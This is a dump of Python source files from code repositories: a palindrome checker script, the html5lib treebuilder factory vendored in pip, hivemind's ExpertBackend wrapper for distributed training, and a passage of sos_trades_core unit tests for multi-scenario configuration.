1bb7ad7d12ca47f72c3d6e1be3d308044cde6cc1 | 189 | py | Python | text/is_palindrome.py | mouckatron/Martyr2MegaProjectList | 96cea1ea409a50626a2cb91d750f99e9bdf95464 | [
"MIT"
] | null | null | null | text/is_palindrome.py | mouckatron/Martyr2MegaProjectList | 96cea1ea409a50626a2cb91d750f99e9bdf95464 | [
"MIT"
] | null | null | null | text/is_palindrome.py | mouckatron/Martyr2MegaProjectList | 96cea1ea409a50626a2cb91d750f99e9bdf95464 | [
"MIT"
] | null | null | null | #! /usr/bin/python2.7
import sys
data = sys.stdin.read().strip()
if data == data[::-1]:
sys.exit(0) # 0 is true or no failure
else:
sys.exit(1) # 1 is false or failure
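# Usage sketch (editorial note, not part of the original script): the answer is
# returned via the exit status, so from a shell one would check $?, e.g.
#   echo "racecar" | python2.7 is_palindrome.py; echo $?   -> 0 (palindrome)
#   echo "hello"   | python2.7 is_palindrome.py; echo $?   -> 1 (not a palindrome)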
| 15.75 | 41 | 0.624339 |
e23288474fc6445e48a0be0e2a554416af5431b6 | 3,406 | py | Python | env/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py | lindamar/ecclesi | cad07fc78daf6facd1b74cc1cb1872aaf4771fa2 | [
"MIT"
] | 674 | 2015-11-06T04:22:47.000Z | 2022-02-26T17:31:43.000Z | env/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py | lindamar/ecclesi | cad07fc78daf6facd1b74cc1cb1872aaf4771fa2 | [
"MIT"
] | 3,243 | 2017-02-07T15:30:01.000Z | 2022-03-31T16:42:19.000Z | env/lib/python2.7/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py | lindamar/ecclesi | cad07fc78daf6facd1b74cc1cb1872aaf4771fa2 | [
"MIT"
] | 210 | 2017-09-01T00:10:08.000Z | 2022-03-19T18:05:12.000Z | """A collection of modules for building different kinds of tree from
HTML documents.
To create a treebuilder for a new type of tree, you need to
implement several things:
1) A set of classes for various types of elements: Document, Doctype,
Comment, Element. These must implement the interface of
_base.treebuilders.Node (although comment nodes have a different
signature for their constructor, see treebuilders.etree.Comment)
Textual content may also be implemented as another node type, or not, as
your tree implementation requires.
2) A treebuilder object (called TreeBuilder by convention) that
inherits from treebuilders._base.TreeBuilder. This has 4 required attributes:
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
It also has one required method:
getDocument - Returns the root node of the complete document tree
3) If you wish to run the unit tests, you must also create a
testSerializer method on your treebuilder which accepts a node and
returns a string containing Node and its children serialized according
to the format used in the unittests
"""
from __future__ import absolute_import, division, unicode_literals
from .._utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation=None, **kwargs):
"""Get a TreeBuilder class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - A generic builder for DOM implementations, defaulting to
a xml.dom.minidom based implementation.
"etree" - A generic builder for tree implementations exposing an
ElementTree-like interface, defaulting to
xml.etree.cElementTree if available and
xml.etree.ElementTree if not.
"lxml" - A etree-based builder for lxml.etree, handling
limitations of lxml's implementation.
implementation - (Currently applies to the "etree" and "dom" tree types). A
module implementing the tree type e.g.
xml.etree.ElementTree or xml.etree.cElementTree."""
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "dom":
from . import dom
# Come up with a sane default (pref. from the stdlib)
if implementation is None:
from xml.dom import minidom
implementation = minidom
# NEVER cache here, caching is done in the dom submodule
return dom.getDomModule(implementation, **kwargs).TreeBuilder
elif treeType == "lxml":
from . import etree_lxml
treeBuilderCache[treeType] = etree_lxml.TreeBuilder
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""Unrecognised treebuilder "%s" """ % treeType)
return treeBuilderCache.get(treeType)
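# Editorial usage sketch (not part of the original module): a tree builder from
# getTreeBuilder is normally handed to an HTMLParser. The import path assumes
# the copy vendored inside pip; a standalone install would just use ``import html5lib``.
def _usage_sketch():
    from pip._vendor import html5lib
    parser = html5lib.HTMLParser(tree=html5lib.getTreeBuilder("etree"))
    return parser.parse("<p>Hello <b>world")  # an ElementTree element for "etree"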
| 44.233766 | 79 | 0.685555 |
a67dba6522c8a61453b32bc3ca21f85bc77aee93 | 10,764 | py | Python | hivemind/server/expert_backend.py | Vsevolod-pl/hivemind | 0300cfd91adeb14d91d9659a98221628f9b775b9 | [
"MIT"
] | 11 | 2021-06-21T19:56:01.000Z | 2021-12-22T09:06:09.000Z | hivemind/server/expert_backend.py | Vsevolod-pl/hivemind | 0300cfd91adeb14d91d9659a98221628f9b775b9 | [
"MIT"
] | null | null | null | hivemind/server/expert_backend.py | Vsevolod-pl/hivemind | 0300cfd91adeb14d91d9659a98221628f9b775b9 | [
"MIT"
] | null | null | null | from typing import Dict, Sequence, Any, Tuple, Union, Callable
import torch
from torch import nn
from hivemind.server.task_pool import TaskPool
from hivemind.utils import BatchTensorDescriptor, DUMMY_BATCH_SIZE
from hivemind.utils.logging import get_logger
from hivemind.utils.nested import nested_flatten, nested_pack, nested_compare, nested_map
logger = get_logger(__name__)
class ExpertBackend:
"""
ExpertBackend is a wrapper around torch module that allows it to run tasks asynchronously with Runtime
By default, ExpertBackend handles three types of requests:
- forward - receive inputs and compute outputs. Concurrent requests will be batched for better GPU utilization.
- backward - receive gradients w.r.t. outputs, compute gradients w.r.t. inputs and **update expert**. Also batched.
- get_info - return expert metadata. Not batched.
:param expert: nn.Module to be wrapped into a backend. Arbitrary pytorch module with a few limitations:
     - Experts must always receive the same set of args and kwargs and produce output tensors of the same type
     - All args, kwargs and outputs must be **tensors** where 0-th dimension represents the batch size
- We recommend using experts that are ~invariant to the order in which they process batches
- Using randomness (e.g. Dropout) leads to different samples at forward and backward. If you want consistency,
you should explicitly register these random variables as model inputs or outputs.
See hivemind.utils.custom_layers.DeterministicDropout for an example
:param optimizer: torch optimizer to be applied on every backward call
:param scheduler: a function to create the learning rate scheduler for the expert
:param args_schema: description of positional arguments to expert.forward, list of BatchTensorProto
:param kwargs_schema: description of keyword arguments to expert.forward, dict of BatchTensorProto
:param outputs_schema: description of outputs from expert.forward, nested structure of BatchTensorProto
:param num_warmup_steps: the number of warmup steps for LR schedule
:param num_total_steps: the total number of steps for LR schedule
:param clip_grad_norm: maximum gradient norm used for clipping
:param kwargs: extra parameters to be forwarded into TaskPool.__init__
"""
def __init__(self, name: str, expert: nn.Module, optimizer: torch.optim.Optimizer, *,
scheduler: Callable = None,
args_schema: Tuple[BatchTensorDescriptor, ...] = None,
kwargs_schema: Dict[str, BatchTensorDescriptor] = None,
outputs_schema: Union[BatchTensorDescriptor, Tuple[BatchTensorDescriptor, ...]] = None,
num_warmup_steps: int = None, num_total_steps: int = None, clip_grad_norm: float = None,
**kwargs):
super().__init__()
self.expert, self.optimizer, self.name = expert, optimizer, name
if scheduler is None:
self.scheduler = None
else:
assert optimizer is not None and num_warmup_steps is not None and num_total_steps is not None
self.scheduler = scheduler(self.optimizer, num_warmup_steps, num_total_steps)
self.clip_grad_norm = clip_grad_norm
self.args_schema = args_schema = tuple(args_schema or ())
self.kwargs_schema = kwargs_schema = dict(kwargs_schema or {})
assert args_schema or kwargs_schema, "expert must receive at least one positional or keyword input." \
" Did you forget to provide args_schema/kwargs_schema?"
if outputs_schema is None:
# run expert once to get outputs schema
dummy_args = tuple(sample.make_empty(DUMMY_BATCH_SIZE) for sample in args_schema)
dummy_kwargs = {key: sample.make_empty(DUMMY_BATCH_SIZE) for key, sample in kwargs_schema.items()}
dummy_outputs = self.expert(*dummy_args, **dummy_kwargs)
outputs_schema = nested_map(BatchTensorDescriptor.from_tensor, dummy_outputs)
self.forward_schema = (self.args_schema, self.kwargs_schema) # inputs for forward
self.outputs_schema = outputs_schema # outputs from forward
self.backward_schema = (self.forward_schema, self.outputs_schema) # inputs to backward
self.grad_inputs_schema = self.forward_schema # outputs from backward
self.forward_pool = TaskPool(self.forward, name=f'{self.name}_forward', **kwargs)
self.backward_pool = TaskPool(self.backward, name=f'{self.name}_backward', **kwargs)
self.update_count = 0
self.examples_processed = 0
def forward(self, *inputs: torch.Tensor) -> Tuple[torch.Tensor, ...]:
"""
Apply forward pass to an aggregated batch of requests. Used by Runtime, do not call this manually;
To submit a request for asynchronous processing, please use ``ExpertBackend.forward_pool.submit_task``.
Subclassing:
           This method receives a sequence of torch tensors following ``nested_flatten(self.forward_schema)``;
           It should return outputs that follow ``nested_flatten(self.outputs_schema)``;
.. todo we handle layer states (e.g. batchnorm stats) incorrectly, updating them twice.
.. For now, either register all buffers as outputs or avoid stateful experts
"""
args, kwargs = nested_pack(inputs, structure=self.forward_schema)
if args[0].shape[0] == 0:
raise RuntimeError("Batch should contain more than 0 samples")
with torch.no_grad():
outputs = self.expert(*args, **kwargs)
# Note: TaskPool requires function to accept and return a flat tuple of values, we pack/unpack it on client side
return tuple(nested_flatten(outputs))
def backward(self, *inputs: torch.Tensor) -> Tuple[torch.Tensor, ...]:
"""
Apply backward pass to an aggregated batch of requests. Used by Runtime, do not call this manually
To submit a request for asynchronous processing, please use ``ExpertBackend.backward_pool.submit_task``.
Subclassing:
This method receives a sequence of torch tensors following ``nested_flatten(self.backward_schema)``;
It should return gradients w.r.t. inputs that follow ``nested_flatten(self.forward_schema)``;
Runtime doesn't guarantee that backward will be performed in the same order and for the same data
as forward, so we recommend stateless backward pass that re-runs expert forward pass inside backward.
.. todo correct state handling (see forward)
Please make sure to call ``ExpertBackend.apply_gradients`` here, otherwise the expert will not train
"""
(args, kwargs), grad_outputs = nested_pack(inputs, structure=self.backward_schema)
with torch.enable_grad():
args = [tensor.detach().requires_grad_(True) if tensor.dtype in (torch.half, torch.float, torch.double)
else tensor.detach() for tensor in args]
kwargs = {input_key: (tensor.detach().requires_grad_(True)
if tensor.is_floating_point() else tensor.detach())
for input_key, tensor in kwargs.items()}
batch_size = args[0].size(0)
outputs = self.expert(*args, **kwargs)
assert nested_compare(outputs, grad_outputs), "outputs and grad_outputs must have the same structure"
outputs_flat = tuple(nested_flatten(outputs))
grad_outputs_flat = tuple(map(
lambda grad, out: grad.to(device=out.device, dtype=out.dtype, non_blocking=True),
nested_flatten(grad_outputs), outputs_flat))
torch.autograd.backward(outputs_flat, grad_tensors=grad_outputs_flat,
create_graph=False, retain_graph=False)
self.apply_gradients(batch_size)
return tuple(x.grad if isinstance(x.grad, torch.Tensor) else torch.zeros_like(x)
for x in nested_flatten((args, kwargs)))
def apply_gradients(self, batch_size) -> None:
"""
Train the expert for one step. This method is called by ``ExpertBackend.backward`` after computing gradients.
"""
if self.clip_grad_norm is not None:
torch.nn.utils.clip_grad_norm_(self.expert.parameters(), self.clip_grad_norm)
self.optimizer.step()
self.optimizer.zero_grad()
if self.scheduler is not None:
self.scheduler.step()
self.update_count += 1
self.examples_processed += batch_size
def get_stats(self) -> Dict:
"""
Return current expert training statistics (number of updates, number of processed examples after last optimizer step)
"""
return {
'updates': self.update_count,
'examples_processed': self.examples_processed
}
def get_full_state(self) -> Dict:
"""
Return the current state of the expert (including batch processing statistics)
"""
full_state = {
'stats': self.get_stats(),
'model': self.expert.state_dict(),
'optimizer': self.optimizer.state_dict(),
'scheduler': {} if self.scheduler is None else self.scheduler.state_dict()
}
return full_state
def load_full_state(self, state_dict: Dict):
if 'stats' in state_dict:
self.update_count = state_dict['stats']['updates']
self.examples_processed = state_dict['stats']['examples_processed']
else:
logger.warning(f'Batch processing stats missing for expert {self.name}')
self.expert.load_state_dict(state_dict['model'])
if 'optimizer' in state_dict:
self.optimizer.load_state_dict(state_dict['optimizer'])
else:
logger.warning(f'Optimizer state missing for expert {self.name}')
if self.scheduler is not None and 'scheduler' in state_dict:
self.scheduler.load_state_dict(state_dict['scheduler'])
else:
logger.warning(f'Learning rate scheduler state missing for expert {self.name}')
def get_info(self) -> Dict[str, Any]:
""" Get expert parameters and stats. Used by RemoteExpert to check shapes and for DMoE orchestration. """
return dict(forward_schema=self.forward_schema, outputs_schema=self.outputs_schema,
keyword_names=tuple(self.kwargs_schema.keys()))
def get_pools(self) -> Sequence[TaskPool]:
""" return all pools that should be processed by ``Runtime`` """
return self.forward_pool, self.backward_pool
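# Editorial sketch (not part of the original file): minimal construction of an
# ExpertBackend around a tiny torch module. The sizes and the ``max_batch_size``
# kwarg (forwarded to TaskPool) are illustrative, not recommended settings.
def _example_expert_backend(hidden_dim: int = 64) -> 'ExpertBackend':
    expert = nn.Linear(hidden_dim, hidden_dim)
    return ExpertBackend(
        name='ffn_expert.0',
        expert=expert,
        optimizer=torch.optim.Adam(expert.parameters()),
        args_schema=(BatchTensorDescriptor(hidden_dim),),
        outputs_schema=BatchTensorDescriptor(hidden_dim),
        max_batch_size=16,
    )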
| 50.065116 | 125 | 0.678558 |
9d6dcaec00f412707cca21822d9dcd4cf71710f3 | 40,498 | py | Python | sos_trades_core/tests/l0_test_36_simple_multi_scenario.py | os-climate/sostrades-core | bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9 | [
"Apache-2.0"
] | 8 | 2022-01-10T14:44:28.000Z | 2022-03-31T08:57:14.000Z | sos_trades_core/tests/l0_test_36_simple_multi_scenario.py | os-climate/sostrades-core | bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9 | [
"Apache-2.0"
] | null | null | null | sos_trades_core/tests/l0_test_36_simple_multi_scenario.py | os-climate/sostrades-core | bcaa9b5e393ffbd0963e75a9315b27caf8b0abd9 | [
"Apache-2.0"
] | 1 | 2022-02-21T14:51:45.000Z | 2022-02-21T14:51:45.000Z | '''
Copyright 2022 Airbus SAS
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
'''
mode: python; py-indent-offset: 4; tab-width: 4; coding: utf-8
'''
import unittest
from time import sleep
from shutil import rmtree
from pathlib import Path
from os.path import join
import pandas as pd
import numpy as np
from sos_trades_core.execution_engine.execution_engine import ExecutionEngine
from sos_trades_core.execution_engine.sos_simple_multi_scenario import SoSSimpleMultiScenario
from sos_trades_core.execution_engine.scatter_data import SoSScatterData
from sos_trades_core.execution_engine.sos_discipline_scatter import SoSDisciplineScatter
from tempfile import gettempdir
from sos_trades_core.tools.rw.load_dump_dm_data import DirectLoadDump
from sos_trades_core.study_manager.base_study_manager import BaseStudyManager
class TestSimpleMultiScenario(unittest.TestCase):
"""
SoSSimpleMultiScenario test class
"""
def setUp(self):
'''
        Initialize data needed for testing
'''
self.dirs_to_del = []
self.namespace = 'MyCase'
self.study_name = f'{self.namespace}'
self.repo = 'sos_trades_core.sos_processes.test'
self.base_path = 'sos_trades_core.sos_wrapping.test_discs'
self.exec_eng = ExecutionEngine(self.namespace)
self.factory = self.exec_eng.factory
self.root_dir = gettempdir()
def tearDown(self):
for dir_to_del in self.dirs_to_del:
sleep(0.5)
if Path(dir_to_del).is_dir():
rmtree(dir_to_del)
sleep(0.5)
def test_01_multi_scenario_of_scatter(self):
# scatter build map
ac_map = {'input_name': 'name_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac',
'gather_ns': 'ns_scenario',
'ns_to_update': ['ns_data_ac']}
self.exec_eng.smaps_manager.add_build_map('name_list', ac_map)
# scenario build map
scenario_map = {'input_name': 'scenario_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'scenario_name',
'scatter_ns': 'ns_scenario',
'gather_ns': 'ns_scatter_scenario',
'ns_to_update': ['ns_disc3', 'ns_barrierr', 'ns_out_disc3']}
self.exec_eng.smaps_manager.add_build_map(
'scenario_list', scenario_map)
# shared namespace
self.exec_eng.ns_manager.add_ns('ns_barrierr', 'MyCase')
self.exec_eng.ns_manager.add_ns(
'ns_scatter_scenario', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_disc3', 'MyCase.multi_scenarios.Disc3')
self.exec_eng.ns_manager.add_ns(
'ns_out_disc3', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_data_ac', 'MyCase')
        # instantiate factory and get the builders from the process (Discipline instantiators)
builder_list = self.factory.get_builder_from_process(repo=self.repo,
mod_id='test_disc1_scenario')
scatter_list = self.exec_eng.factory.create_multi_scatter_builder_from_list(
'name_list', builder_list=builder_list, autogather=True)
mod_list = f'{self.base_path}.disc3_scenario.Disc3'
disc3_builder = self.exec_eng.factory.get_builder_from_module(
'Disc3', mod_list)
scatter_list.append(disc3_builder)
multi_scenarios = self.exec_eng.factory.create_simple_multi_scenario_builder(
'multi_scenarios', 'scenario_list', scatter_list, autogather=True, gather_node='Post-processing')
self.exec_eng.factory.set_builders_to_coupling_builder(
multi_scenarios)
self.exec_eng.configure()
self.exec_eng.display_treeview_nodes()
dict_values = {
f'{self.study_name}.multi_scenarios.trade_variables': {'x': 'float'}}
self.exec_eng.load_study_from_input_dict(dict_values)
scenario_df = pd.DataFrame(columns=['scenario_name', 'x'])
self.assertTrue(scenario_df.equals(
self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df')))
x1 = 2.
x2 = 4.
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x'])
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_df = pd.DataFrame([['scenario_1', x1], ['scenario_2', x2]], columns=[
'scenario_name', 'x'])
print(scenario_df)
print(self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df'))
self.assertTrue(scenario_df.equals(
self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df')))
dict_values = {self.study_name +
'.multi_scenarios.name_list': ['name_1', 'name_2']}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
private_val = {}
scenario_list = ['scenario_1', 'scenario_2']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
private_val[self.study_name + '.name_1.a'] = a1
private_val[self.study_name + '.name_2.a'] = a2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
private_val[self.study_name +
'.multi_scenarios.scenario_1.Disc3.z'] = 1.2
private_val[self.study_name +
'.multi_scenarios.scenario_2.Disc3.z'] = 1.5
self.exec_eng.load_study_from_input_dict(private_val)
self.exec_eng.execute()
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.x'), x1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.x'), x2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x1 + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2 + b2)
def test_02_multi_scenario_of_scatter_name1_x_trade_variable(self):
# scatter build map
ac_map = {'input_name': 'name_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac',
'gather_ns': 'ns_scenario',
'ns_to_update': ['ns_data_ac']}
self.exec_eng.smaps_manager.add_build_map('name_list', ac_map)
# scenario build map
scenario_map = {'input_name': 'scenario_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'scenario_name',
'scatter_ns': 'ns_scenario',
'gather_ns': 'ns_scatter_scenario',
'ns_to_update': ['ns_disc3', 'ns_barrierr', 'ns_out_disc3']}
self.exec_eng.smaps_manager.add_build_map(
'scenario_list', scenario_map)
# shared namespace
self.exec_eng.ns_manager.add_ns('ns_barrierr', 'MyCase')
self.exec_eng.ns_manager.add_ns(
'ns_scatter_scenario', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_disc3', 'MyCase.multi_scenarios.Disc3')
self.exec_eng.ns_manager.add_ns(
'ns_out_disc3', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_data_ac', 'MyCase')
        # instantiate factory and get the builders from the process (Discipline instantiators)
builder_list = self.factory.get_builder_from_process(repo=self.repo,
mod_id='test_disc1_scenario')
scatter_list = self.exec_eng.factory.create_multi_scatter_builder_from_list(
'name_list', builder_list=builder_list, autogather=True)
mod_list = f'{self.base_path}.disc3_scenario.Disc3'
disc3_builder = self.exec_eng.factory.get_builder_from_module(
'Disc3', mod_list)
scatter_list.append(disc3_builder)
multi_scenarios = self.exec_eng.factory.create_simple_multi_scenario_builder(
'multi_scenarios', 'scenario_list', scatter_list, autogather=True)
self.exec_eng.factory.set_builders_to_coupling_builder(
multi_scenarios)
self.exec_eng.configure()
self.exec_eng.display_treeview_nodes()
dict_values = {
f'{self.study_name}.multi_scenarios.trade_variables': {'name_1.x': 'float'}}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
scenario_df = pd.DataFrame(columns=['scenario_name', 'name_1.x'])
self.assertTrue(scenario_df.equals(
self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df')))
x1 = 2.
x2 = 4.
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'name_1.x'])
dict_values[f'{self.study_name}.multi_scenarios.scenario_df'] = scenario_df
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
self.assertTrue(scenario_df.equals(
self.exec_eng.dm.get_value('MyCase.multi_scenarios.scenario_df')))
dict_values[self.study_name +
'.multi_scenarios.name_list'] = ['name_1', 'name_2']
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes(display_variables='var_name')
private_val = {}
scenario_list = ['scenario_1', 'scenario_2']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
x2b = 5.0
private_val[self.study_name + '.name_1.a'] = a1
private_val[self.study_name + '.name_2.a'] = a2
private_val[self.study_name + '.name_2.x'] = x2b
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
private_val[self.study_name +
'.multi_scenarios.scenario_1.Disc3.z'] = 1.2
private_val[self.study_name +
'.multi_scenarios.scenario_2.Disc3.z'] = 1.5
dict_values.update(private_val)
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.execute()
x1 = 2
x2 = 4
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.x'), x1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.x'), x2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_1.y'), a1 * x1 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_1.name_2.y'), a2 * x2b + b2)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_1.y'), a1 * x2 + b1)
self.assertEqual(self.exec_eng.dm.get_value(
'MyCase.multi_scenarios.scenario_2.name_2.y'), a2 * x2b + b2)
def test_03_consecutive_configure(self):
# scatter build map
ac_map = {'input_name': 'name_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'ac_name',
'scatter_ns': 'ns_ac',
'gather_ns': 'ns_scenario',
'ns_to_update': ['ns_data_ac']}
self.exec_eng.smaps_manager.add_build_map('name_list', ac_map)
# scenario build map
scenario_map = {'input_name': 'scenario_list',
'input_type': 'string_list',
'input_ns': 'ns_scatter_scenario',
'output_name': 'scenario_name',
'scatter_ns': 'ns_scenario',
'gather_ns': 'ns_scatter_scenario',
'ns_to_update': ['ns_disc3', 'ns_barrierr', 'ns_out_disc3']}
self.exec_eng.smaps_manager.add_build_map(
'scenario_list', scenario_map)
# shared namespace
self.exec_eng.ns_manager.add_ns('ns_barrierr', 'MyCase')
self.exec_eng.ns_manager.add_ns(
'ns_scatter_scenario', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_disc3', 'MyCase.multi_scenarios.Disc3')
self.exec_eng.ns_manager.add_ns(
'ns_out_disc3', 'MyCase.multi_scenarios')
self.exec_eng.ns_manager.add_ns(
'ns_data_ac', 'MyCase')
        # instantiate factory and get the builders from the process (Discipline instantiators)
builder_list = self.factory.get_builder_from_process(repo=self.repo,
mod_id='test_disc1_scenario')
scatter_list = self.exec_eng.factory.create_multi_scatter_builder_from_list(
'name_list', builder_list=builder_list, autogather=True)
mod_path = f'{self.base_path}.disc3_scenario.Disc3'
disc3_builder = self.exec_eng.factory.get_builder_from_module(
'Disc3', mod_path)
scatter_list.append(disc3_builder)
multi_scenarios = self.exec_eng.factory.create_simple_multi_scenario_builder(
'multi_scenarios', 'scenario_list', scatter_list, autogather=True, gather_node='Post-processing')
self.exec_eng.factory.set_builders_to_coupling_builder(
multi_scenarios)
self.exec_eng.configure()
self.exec_eng.display_treeview_nodes()
x1 = 2
x2 = 4
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x'])
dict_values = {f'{self.study_name}.multi_scenarios.trade_variables': {'x': 'float'},
f'{self.study_name}.multi_scenarios.name_list': ['name_1', 'name_2'],
f'{self.study_name}.multi_scenarios.scenario_df': scenario_df}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'scenario_1', 'scenario_2'])
scenario_df = pd.DataFrame(
[['scenario_1', x1]], columns=['scenario_name', 'x'])
dict_values = {self.study_name +
'.multi_scenarios.scenario_df': scenario_df}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'scenario_1'])
dict_values = {
self.study_name + '.multi_scenarios.name_list': ['name_1', 'name_2', 'name_3']}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'scenario_1'])
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios.scenario_1.Disc1'):
if isinstance(disc, SoSDisciplineScatter):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'name_1', 'name_2', 'name_3'])
scenario_df = pd.DataFrame(
[['scenario_1', x1], ['scenario_2', x2]], columns=['scenario_name', 'x'])
dict_values = {self.study_name + '.multi_scenarios.scenario_df': scenario_df,
self.study_name + '.multi_scenarios.name_list': ['name_1', 'name_2']}
self.exec_eng.load_study_from_input_dict(dict_values)
self.exec_eng.display_treeview_nodes()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'scenario_1', 'scenario_2'])
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios.scenario_1.Disc1'):
if isinstance(disc, SoSDisciplineScatter):
self.assertListEqual(list(disc.get_scattered_disciplines().keys()), [
'name_1', 'name_2'])
private_val = {}
scenario_list = ['scenario_1', 'scenario_2']
for scenario in scenario_list:
a1 = 3
b1 = 4
a2 = 6
b2 = 2
private_val[self.study_name + '.name_1.a'] = a1
private_val[self.study_name + '.name_2.a'] = a2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_1.b'] = b1
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc1.name_2.b'] = b2
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.constant'] = 3
private_val[self.study_name + '.multi_scenarios.' +
scenario + '.Disc3.power'] = 2
private_val[self.study_name +
'.multi_scenarios.scenario_1.Disc3.z'] = 1.2
private_val[self.study_name +
'.multi_scenarios.scenario_2.Disc3.z'] = 1.5
self.exec_eng.load_study_from_input_dict(private_val)
self.exec_eng.execute()
for disc in self.exec_eng.dm.get_disciplines_with_name('MyCase.multi_scenarios'):
if isinstance(disc, SoSSimpleMultiScenario):
self.assertListEqual(
[key for key in list(disc.get_data_io_dict('in').keys()) if key not in disc.NUM_DESC_IN], ['trade_variables', 'scenario_list', 'scenario_df', 'scenario_dict'])
